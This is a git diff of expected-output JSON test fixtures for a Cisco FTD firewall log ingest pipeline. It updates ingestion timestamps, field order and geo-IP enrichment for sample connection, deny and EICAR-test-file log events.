@@ -2792,7 +2792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983163200Z", + "ingested": "2021-12-14T14:40:06.019747850Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2871,7 +2871,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983168900Z", + "ingested": "2021-12-14T14:40:06.019748319Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -2948,7 +2948,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983173900Z", + "ingested": "2021-12-14T14:40:06.019748702Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -3026,7 +3026,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983177900Z", + "ingested": "2021-12-14T14:40:06.019749096Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3106,7 +3106,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983182900Z", + "ingested": "2021-12-14T14:40:06.019749509Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", 
@@ -3188,7 +3188,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:35:10.983186900Z", + "ingested": "2021-12-14T14:40:06.019749884Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", @@ -3269,7 +3269,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:35:10.983191Z", + "ingested": "2021-12-14T14:40:06.019750328Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3350,7 +3350,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:35:10.983195300Z", + "ingested": "2021-12-14T14:40:06.019750729Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3423,7 +3423,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983199300Z", + "ingested": "2021-12-14T14:40:06.019751124Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3493,7 +3493,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983203800Z", + "ingested": "2021-12-14T14:40:06.019751508Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", 
@@ -3568,7 +3568,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983209100Z", + "ingested": "2021-12-14T14:40:06.019751886Z", "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", @@ -3646,7 +3646,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983214200Z", + "ingested": "2021-12-14T14:40:06.019752391Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3726,7 +3726,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:35:10.983218100Z", + "ingested": "2021-12-14T14:40:06.019752774Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3808,7 +3808,7 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:35:10.983225100Z", + "ingested": "2021-12-14T14:40:06.019753157Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", @@ -3881,7 +3881,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-12-09T13:35:10.983229900Z", + "ingested": "2021-12-14T14:40:06.019753550Z", "original": "Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", 
@@ -3948,7 +3948,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983233900Z", + "ingested": "2021-12-14T14:40:06.019753938Z", "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4012,7 +4012,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983238Z", + "ingested": "2021-12-14T14:40:06.019754326Z", "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4076,7 +4076,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983241500Z", + "ingested": "2021-12-14T14:40:06.019754730Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4140,7 +4140,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983246100Z", + "ingested": "2021-12-14T14:40:06.019755127Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4204,7 +4204,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983249900Z", + "ingested": "2021-12-14T14:40:06.019755519Z", "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4268,7 +4268,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983254600Z", + "ingested": "2021-12-14T14:40:06.019755900Z", "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", 
@@ -4332,7 +4332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983260400Z", + "ingested": "2021-12-14T14:40:06.019756279Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4396,7 +4396,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:10.983266Z", + "ingested": "2021-12-14T14:40:06.019756670Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4471,7 +4471,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983271800Z", + "ingested": "2021-12-14T14:40:06.019757058Z", "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", @@ -4536,7 +4536,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:10.983277600Z", + "ingested": "2021-12-14T14:40:06.019757452Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4599,7 +4599,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983283300Z", + "ingested": "2021-12-14T14:40:06.019757837Z", "original": "Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", 
@@ -4680,7 +4680,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983289Z", + "ingested": "2021-12-14T14:40:06.019758222Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", @@ -4762,7 +4762,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983294800Z", + "ingested": "2021-12-14T14:40:06.019758874Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", @@ -4844,7 +4844,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983316300Z", + "ingested": "2021-12-14T14:40:06.019759882Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", @@ -4908,7 +4908,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983321600Z", + "ingested": "2021-12-14T14:40:06.019760284Z", "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", 
@@ -4964,7 +4964,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983326800Z", + "ingested": "2021-12-14T14:40:06.019760674Z", "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", @@ -5026,7 +5026,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983330700Z", + "ingested": "2021-12-14T14:40:06.019761053Z", "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json index 6fed9b7418c..087d2432459 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json @@ -16,15 +16,15 @@ "packets": 1, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "icmp", "transport": "icmp", "application": "icmp client", "iana_number": "1" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -62,7 +62,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:19.255488700Z", + "ingested": "2021-12-14T14:40:15.787909748Z", "original": "2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -131,15 +131,15 @@ "packets": 1, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "icmp", "transport": "icmp", "application": "icmp client", "iana_number": "1" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -178,7 +178,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:19.255497100Z", + "ingested": "2021-12-14T14:40:15.787913180Z", "original": "2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity", "code": "430003", "kind": "event", 
@@ -238,37 +238,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "eu-central-1.ec2.archive.ubuntu.com", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 0, - "ip": "81.2.69.144", - "packets": 0 + "packets": 0, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "eu-central-1.ec2.archive.ubuntu.com", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -277,15 +271,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -323,7 +317,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:19.255502700Z", + "ingested": "2021-12-14T14:40:15.787913981Z", "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "code": "430002", "kind": "event", @@ -382,37 +376,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "siem-inside", - "type": "A" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 314, - "ip": "81.2.69.144", - "packets": 2 + "packets": 2, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "siem-inside", + "type": "A" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", 
@@ -421,15 +409,15 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -468,7 +456,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:19.255508Z", + "ingested": "2021-12-14T14:40:15.787914619Z", "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", "code": "430003", "kind": "event", @@ -535,27 +523,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", 
@@ -564,13 +546,13 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -608,7 +590,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:19.255513300Z", + "ingested": "2021-12-14T14:40:15.787915252Z", "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -666,27 +648,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 41319018, - "ip": "81.2.69.144", - "packets": 29001 + "packets": 29001, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -702,9 +678,6 @@ "scheme": "http", "domain": "eu-central-1.ec2.archive.ubuntu.com" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", @@ -714,6 +687,9 @@ ], "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -757,7 +733,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-09T13:35:19.255518700Z", + "ingested": "2021-12-14T14:40:15.787915858Z", "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", "code": "430003", "kind": "event", @@ -829,27 +805,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -858,13 +828,13 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -902,7 +872,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:19.255524100Z", + "ingested": "2021-12-14T14:40:15.787916449Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -960,27 +930,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 690, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -996,15 +960,15 @@ "scheme": "http", "domain": "www.eicar.org" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -1048,7 +1012,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:19.255529400Z", + "ingested": "2021-12-14T14:40:15.787917061Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", "code": "430003", "kind": "event", @@ -1128,13 +1092,13 @@ "packets": 0, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "1", "transport": "icmp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1172,7 +1136,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:19.255534900Z", + "ingested": "2021-12-14T14:40:15.787917647Z", "original": "2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", 
@@ -1252,15 +1216,15 @@ "10.0.100.30:8000" ] }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1304,7 +1268,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-09T13:35:19.255540300Z", + "ingested": "2021-12-14T14:40:15.787918240Z", "original": "Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json index 0a3f9cc5b09..52059c43e18 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json 
